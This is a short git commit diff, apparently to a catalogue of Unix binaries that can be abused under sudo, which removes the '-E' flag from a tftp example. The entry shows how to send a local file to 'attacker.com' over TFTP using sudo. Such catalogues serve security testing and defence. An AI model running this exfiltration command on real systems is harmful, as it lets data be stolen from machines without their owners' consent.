Remove useless instances of sudo -E

This commit is contained in:
Andrea Cardaci
2020-06-10 22:53:45 +02:00
parent fbd887e91a
commit 9cd6849b8e
5 changed files with 5 additions and 5 deletions

View File

@@ -22,6 +22,6 @@ functions:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
sudo -E tftp $RHOST
sudo tftp $RHOST
put file_to_send
---